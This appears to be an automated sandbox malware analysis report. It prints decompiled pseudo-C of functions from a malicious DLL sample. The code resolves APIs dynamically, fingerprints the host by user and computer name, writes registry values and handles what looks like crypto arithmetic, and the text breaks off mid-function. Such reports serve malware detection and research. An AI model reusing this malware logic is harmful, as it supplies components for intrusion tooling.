                    0x010c6268
                    0x010c6268
                    0x010c626d
                    0x010c6280
                    0x010c6282
                    0x010c6287
                    0x010c628f
                    0x010c6296
                    0x010c629a
                    0x010c629d
                    0x010c631c
                    0x010c631d
                    0x010c629f
                    0x010c629f
                    0x010c62a4
                    0x010c62ac
                    0x010c62b0
                    0x010c62b3
                    0x00000000
                    0x010c62b5
                    0x010c62b5
                    0x010c62ba
                    0x010c62c2
                    0x010c62c6
                    0x010c62c9
                    0x00000000
                    0x010c62cb
                    0x010c62cb
                    0x010c62d0
                    0x010c62d8
                    0x010c62dc
                    0x010c62df
                    0x00000000
                    0x010c62e1
                    0x010c62e1
                    0x010c62e6
                    0x010c62ee
                    0x010c62f2
                    0x010c62f5
                    0x00000000
                    0x010c62f7
                    0x010c62fd
                    0x010c6302
                    0x010c6309
                    0x010c6310
                    0x010c6313
                    0x00000000
                    0x010c6315
                    0x010c6318
                    0x010c6318
                    0x010c6313
                    0x010c62f5
                    0x010c62df
                    0x010c62c9
                    0x010c62b3
                    0x010c629d
                    0x010c6332

                    APIs
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,010C1986,?,?,?,?,00000000,00000000), ref: 010C6274
                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 010C6296
                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 010C62AC
                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 010C62C2
                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010C62D8
                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010C62EE
                      • Part of subcall function 010C462B: memset.NTDLL ref: 010C46AA
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateHandleHeapModulememset
                    • String ID:
                    • API String ID: 1886625739-0
                    • Opcode ID: 16e034b3de3ff4b009e07606ffbf5a7b10ffa3fc51aa9c0b393da13747786451
                    • Instruction ID: bf8036b41a6608c9f34192a7d30fae40995744f0f2a640c1690b2408ddcfca24
                    • Opcode Fuzzy Hash: 16e034b3de3ff4b009e07606ffbf5a7b10ffa3fc51aa9c0b393da13747786451
                    • Instruction Fuzzy Hash: E62160B160020AEFD770DF68C844E9E7BECFB49644B088169F985D7301E77AE9098F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C2B1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E010C2B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x10ca3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E010C5406( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E010C7488(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E010C17AB(_a8);
						goto L29;
					}
					_t64 =  *0x10ca318; // 0x37a9d58
					_t16 = _t64 + 0xc; // 0x37a9e7a
					_t65 = E010C5406(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d010c90
						if(E010C5B98(_t97,  *_t33, _t91, _a8,  *0x10ca3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x10ca320; // 0x26dd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x10cba3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x10cb8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E010C266A(_t69,  *0x10ca3d4,  *0x10ca3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x10ca320; // 0x26dd5a8
									_t44 = _t71 + 0x10cb846; // 0x74666f53
									_t73 = E010C5406(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d010c90
										E010C34EE( *_t47, _t91, _a8,  *0x10ca3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d010c90
										E010C34EE( *_t49, _t91, _t99,  *0x10ca3d0, _a16);
										E010C17AB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d010c90
									E010C34EE( *_t40, _t91, _a8,  *0x10ca3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d010c90
									E010C34EE( *_t43, _t91, _a8,  *0x10ca3d0, _a16);
								}
								if( *_t101 != 0) {
									E010C17AB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d010c90
					_t81 = E010C1BC5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d010c90
							E010C5B98(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E010C17AB(_t100);
						_t98 = _a16;
					}
					E010C17AB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E010C7961(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x10ca3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                    0x010c2b1e
                    0x010c2b27
                    0x010c2b2e
                    0x010c2b33
                    0x010c2ba0
                    0x010c2ba6
                    0x010c2bab
                    0x010c2bb2
                    0x010c2bb9
                    0x010c2bbc
                    0x010c2d27
                    0x010c2d2e
                    0x010c2d2e
                    0x010c2d33
                    0x010c2d35
                    0x010c2d35
                    0x010c2d3e
                    0x010c2d3e
                    0x010c2bc2
                    0x010c2bce
                    0x010c2d1d
                    0x010c2d20
                    0x00000000
                    0x010c2d20
                    0x010c2bd4
                    0x010c2bd9
                    0x010c2bdc
                    0x010c2be3
                    0x010c2be6
                    0x010c2c2f
                    0x010c2c2f
                    0x010c2c42
                    0x010c2c4c
                    0x010c2c54
                    0x010c2c59
                    0x010c2c63
                    0x010c2c63
                    0x010c2c5b
                    0x010c2c5b
                    0x010c2c5b
                    0x010c2c5b
                    0x010c2c85
                    0x010c2c8d
                    0x010c2cbb
                    0x010c2cc0
                    0x010c2cc7
                    0x010c2ccc
                    0x010c2cd0
                    0x010c2d02
                    0x010c2cd2
                    0x010c2cdf
                    0x010c2ce2
                    0x010c2cf2
                    0x010c2cf5
                    0x010c2cfb
                    0x010c2cfb
                    0x010c2c8f
                    0x010c2c9c
                    0x010c2c9f
                    0x010c2cb1
                    0x010c2cb4
                    0x010c2cb4
                    0x010c2d0c
                    0x010c2d18
                    0x010c2d0e
                    0x010c2d11
                    0x010c2d11
                    0x010c2d0c
                    0x010c2c85
                    0x00000000
                    0x010c2c4c
                    0x010c2bf5
                    0x010c2bf8
                    0x010c2bff
                    0x010c2c05
                    0x010c2c08
                    0x010c2c0a
                    0x010c2c16
                    0x010c2c19
                    0x010c2c19
                    0x010c2c1f
                    0x010c2c24
                    0x010c2c24
                    0x010c2c2a
                    0x00000000
                    0x010c2c2a
                    0x010c2b38
                    0x00000000
                    0x010c2b5f
                    0x010c2b5f
                    0x010c2b6b
                    0x010c2b7e
                    0x010c2b84
                    0x010c2b8c
                    0x00000000
                    0x010c2b8c

                    APIs
                    • StrChrA.SHLWAPI(010C1850,0000005F,00000000,00000000,00000104), ref: 010C2B51
                    • lstrcpy.KERNEL32(?,?), ref: 010C2B7E
                      • Part of subcall function 010C5406: lstrlen.KERNEL32(?,00000000,037A9D58,00000000,010C3C77,037A9F7B,69B25F44,?,?,?,?,69B25F44,00000005,010CA00C,4D283A53,?), ref: 010C540D
                      • Part of subcall function 010C5406: mbstowcs.NTDLL ref: 010C5436
                      • Part of subcall function 010C5406: memset.NTDLL ref: 010C5448
                      • Part of subcall function 010C34EE: lstrlenW.KERNEL32(?,?,?,010C2CE7,3D010C90,80000002,010C1850,010C5F20,74666F53,4D4C4B48,010C5F20,?,3D010C90,80000002,010C1850,?), ref: 010C3513
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • lstrcpy.KERNEL32(?,00000000), ref: 010C2BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                    • String ID: ($\
                    • API String ID: 3924217599-1512714803
                    • Opcode ID: cd68358fc96b64b10200400b053ee5447bcd84feb8e7239bdb3e9495c7a96746
                    • Instruction ID: a50cca865d50417db3017f33b09bad8de94f5c3f8aaed5167c60392702462ab4
                    • Opcode Fuzzy Hash: cd68358fc96b64b10200400b053ee5447bcd84feb8e7239bdb3e9495c7a96746
                    • Instruction Fuzzy Hash: D4514C3550020EEFDF22AF64DC40EDE7BB9BF18B40F108558FA9596520E736E925AF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C4DFF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E010C4DFF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x10ca3cc; // 0x37a95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x10ca3cc; // 0x37a95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x10ca3cc; // 0x37a95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x10cb81a) {
					HeapFree( *0x10ca2d8, 0, _t10);
					_t7 =  *0x10ca3cc; // 0x37a95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                    0x010c4dff
                    0x010c4e08
                    0x010c4e18
                    0x010c4e18
                    0x010c4e1d
                    0x010c4e22
                    0x00000000
                    0x00000000
                    0x010c4e12
                    0x010c4e12
                    0x010c4e24
                    0x010c4e29
                    0x010c4e2d
                    0x010c4e40
                    0x010c4e46
                    0x010c4e46
                    0x010c4e4f
                    0x010c4e51
                    0x010c4e55
                    0x010c4e5b

                    APIs
                    • RtlEnterCriticalSection.NTDLL(037A9570), ref: 010C4E08
                    • Sleep.KERNEL32(0000000A), ref: 010C4E12
                    • HeapFree.KERNEL32(00000000), ref: 010C4E40
                    • RtlLeaveCriticalSection.NTDLL(037A9570), ref: 010C4E55
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: d5cd9de3e18ec68f44c54e0f061cd531df8c5f45c346f311ac44628912fc1fb6
                    • Instruction ID: 6a04adc6c52124d2c5dfd556fe635db92aae6dcb60632bf736ccdfa445e51422
                    • Opcode Fuzzy Hash: d5cd9de3e18ec68f44c54e0f061cd531df8c5f45c346f311ac44628912fc1fb6
                    • Instruction Fuzzy Hash: 23F03A74300101DFEB249B58D869A1A7BB1BB44704B119049F982D7295D27AA800CF24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C4B71 Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C4B71() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E010C63FD(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E010C17AB(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                    0x010c4b7f
                    0x010c4b82
                    0x010c4b85
                    0x010c4b8b
                    0x010c4b90
                    0x010c4b96
                    0x010c4b9e
                    0x010c4ba1
                    0x010c4ba7
                    0x010c4bac
                    0x010c4bb9
                    0x010c4bc6
                    0x010c4bca
                    0x010c4bcc
                    0x010c4bd0
                    0x010c4bd3
                    0x010c4be3
                    0x010c4c35
                    0x010c4c36
                    0x010c4be5
                    0x010c4be8
                    0x010c4bef
                    0x010c4bf2
                    0x010c4c05
                    0x00000000
                    0x010c4c07
                    0x010c4c0a
                    0x010c4c1d
                    0x010c4c20
                    0x010c4c28
                    0x010c4c2b
                    0x00000000
                    0x010c4c2d
                    0x010c4c2d
                    0x010c4c30
                    0x010c4c30
                    0x010c4c2b
                    0x010c4c05
                    0x010c4c3b
                    0x010c4c3c
                    0x010c4bac
                    0x010c4c42

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 010C4B85
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 010C4BA1
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 010C4BDB
                    • GetComputerNameW.KERNEL32(?,?), ref: 010C4BFD
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 010C4C20
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                    • String ID:
                    • API String ID: 3850880919-0
                    • Opcode ID: 31e66757d12f1ad19a4a504e44f0f58e24de2a42ed51f3a6873f87992d9b9ed9
                    • Instruction ID: 05ce7c634096d947577892c9f9a399da6804018121cd3a8d07434722d9a94297
                    • Opcode Fuzzy Hash: 31e66757d12f1ad19a4a504e44f0f58e24de2a42ed51f3a6873f87992d9b9ed9
                    • Instruction Fuzzy Hash: 1221D67690020CEFDB51DFA8C9C48EEBBF8FE44744B6084AAE541E7210EA349B45DF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C5A5A Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C5A5A(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x10ca30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x10ca2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x10ca2f8 = _t6;
					 *0x10ca304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x10ca2f4 = _t7;
					if(_t7 == 0) {
						 *0x10ca2f4 =  *0x10ca2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                    0x010c5a62
                    0x010c5a6a
                    0x010c5a6f
                    0x00000000
                    0x010c5ac4
                    0x010c5a71
                    0x010c5a79
                    0x010c5a81
                    0x010c5a81
                    0x010c5ac1
                    0x00000000
                    0x010c5ac1
                    0x010c5a83
                    0x010c5a83
                    0x010c5a88
                    0x010c5a9a
                    0x010c5a9f
                    0x010c5aa5
                    0x010c5aad
                    0x010c5ab2
                    0x010c5ab4
                    0x010c5ab4
                    0x00000000
                    0x010c5abb
                    0x010c5a7d
                    0x00000000
                    0x00000000
                    0x010c5a7f
                    0x00000000

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,010C4603,?), ref: 010C5A62
                    • GetVersion.KERNEL32 ref: 010C5A71
                    • GetCurrentProcessId.KERNEL32 ref: 010C5A88
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 010C5AA5
                    • GetLastError.KERNEL32 ref: 010C5AC4
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                    • String ID:
                    • API String ID: 2270775618-0
                    • Opcode ID: 79ac3271c1445b756d4f5cc9df43b0e51232d40a03a2a313d9e82d8bf58006cb
                    • Instruction ID: f39896ea5ef364278af38af4e87af4f8f82862f48cd124e38c51504244f10a5a
                    • Opcode Fuzzy Hash: 79ac3271c1445b756d4f5cc9df43b0e51232d40a03a2a313d9e82d8bf58006cb
                    • Instruction Fuzzy Hash: 6AF03774780326DFD7B09B6DAC49B183AA2A704B95F108559B9D6C61C8E2BB60818F1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C3D67 Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 46%
                    			E010C3D67(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x10ca320; // 0x26dd5a8
					_t5 = _t102 + 0x10cb038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x10c9290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x10ca320; // 0x26dd5a8
												_t28 = _t108 + 0x10cb0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x10ca320; // 0x26dd5a8
														_t33 = _t78 + 0x10cb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                    0x010c3d6c
                    0x010c3d75
                    0x010c3d76
                    0x010c3d7a
                    0x010c3d80
                    0x010c3d86
                    0x010c3d8f
                    0x010c3d95
                    0x010c3d9f
                    0x010c3da1
                    0x010c3da7
                    0x010c3dac
                    0x010c3db7
                    0x010c3dbf
                    0x010c3dc2
                    0x010c3ee5
                    0x010c3dc8
                    0x010c3dc8
                    0x010c3dd5
                    0x010c3ddb
                    0x010c3de1
                    0x010c3de5
                    0x010c3deb
                    0x010c3df8
                    0x010c3dfc
                    0x010c3e02
                    0x010c3e05
                    0x010c3e0b
                    0x010c3e11
                    0x010c3e17
                    0x010c3e1a
                    0x010c3e1d
                    0x010c3e23
                    0x010c3e2c
                    0x010c3e32
                    0x010c3e33
                    0x010c3e36
                    0x010c3e37
                    0x010c3e38
                    0x010c3e40
                    0x010c3e41
                    0x010c3e42
                    0x010c3e44
                    0x010c3e48
                    0x010c3e4c
                    0x00000000
                    0x00000000
                    0x010c3e52
                    0x010c3e5b
                    0x010c3e61
                    0x010c3e6b
                    0x010c3e6f
                    0x010c3e71
                    0x010c3e7e
                    0x010c3e82
                    0x010c3e8a
                    0x010c3e8f
                    0x010c3ea1
                    0x010c3ea3
                    0x010c3ea9
                    0x010c3ea9
                    0x010c3eb2
                    0x010c3eb2
                    0x010c3eb4
                    0x010c3eba
                    0x010c3eba
                    0x010c3ebd
                    0x010c3ec3
                    0x010c3ec6
                    0x010c3ecf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c3ecf
                    0x010c3e23
                    0x010c3e1d
                    0x010c3e05
                    0x010c3ed5
                    0x010c3ed5
                    0x010c3edb
                    0x010c3edb
                    0x010c3ee1
                    0x010c3ee1
                    0x010c3eea
                    0x010c3ef0
                    0x010c3ef0
                    0x010c3dac
                    0x010c3ef9

                    APIs
                    • SysAllocString.OLEAUT32(010C9290), ref: 010C3DB7
                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 010C3E99
                    • SysFreeString.OLEAUT32(00000000), ref: 010C3EB2
                    • SysFreeString.OLEAUT32(?), ref: 010C3EE1
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloclstrcmp
                    • String ID:
                    • API String ID: 1885612795-0
                    • Opcode ID: db37fe77fffcc4bcdde9862647f4e7ba2a2e5a91643a3e4b8a374c8cd41af7d1
                    • Instruction ID: 8db6313b04b4143b11ff96abf5dd9243de2364959db6a2f16a364fd4b7f5f69f
                    • Opcode Fuzzy Hash: db37fe77fffcc4bcdde9862647f4e7ba2a2e5a91643a3e4b8a374c8cd41af7d1
                    • Instruction Fuzzy Hash: 7A514A71E0050AEFCB11DFA8C4889AEF7B9FF89704B148598E955EB254D772AD01CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C420F Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E010C420F(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E010C25C1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E010C2E5D(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E010C375F(_t101,  &_v428, _a8, _t96 - _t81);
					E010C375F(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E010C2E5D(_t101, 0x10ca1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E010C2E5D(_a16, _a4);
						E010C1212(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L010C818A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
